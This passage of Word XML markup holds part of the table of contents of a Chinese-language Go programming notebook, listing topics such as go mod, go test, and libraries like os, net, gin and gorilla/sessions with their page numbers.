              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779774" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>如何让某包在初始化的时候，接受外部传参</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779774 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>250</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="05E9C701" w14:textId="48EEAD6D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779775" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>同一个目录下，如何放两个</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>main</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>并且可以分别编译？</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779775 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>251</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7484383E" w14:textId="65C84AF7" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779776" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>go mod</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>是否支持子模块？</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779776 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>251</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F6E9C49" w14:textId="6DB9A932" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779777" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>如何在已经写好的具有</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>go mod</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>go</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>项目中测试小段代码（非</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> gotest</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779777 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>252</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="216E5671" w14:textId="0B151E13" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779778" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>go test</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779778 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>253</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20F6F030" w14:textId="70A61AF0" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779779" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>golang</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>常用标准库和第三方库</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779779 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>267</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C6931B0" w14:textId="767DFBA1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779780" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>os</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779780 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>267</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2AA3F505" w14:textId="1DC77F8E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779781" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>path</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779781 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>277</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6EFB909D" w14:textId="20D495A3" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779782" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>bufio</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779782 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>278</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43E7C208" w14:textId="4C48A1A1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779783" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>strings</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779783 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>278</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D0B956F" w14:textId="53AA47AE" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779784" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>database</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779784 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>279</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="307085B6" w14:textId="38813856" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779785" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>net</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779785 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>280</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67C66E68" w14:textId="24278792" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779786" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>gin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779786 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>281</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42867D13" w14:textId="4B9BBF7D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779787" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>github.com/gorilla/sessions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779787 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>283</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C790DF5" w14:textId="3BA551EB" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779788" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>github.com/hashicorp/go-retryablehttp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779788 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>283</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B19317F" w14:textId="6E5D3433" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779789" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>time</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779789 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>284</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="608C7F2B" w14:textId="6B5E2816" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779790" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>runtime</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779790 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>286</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08F79101" w14:textId="3AAF04A1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779791" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>终端彩色输出</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779791 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
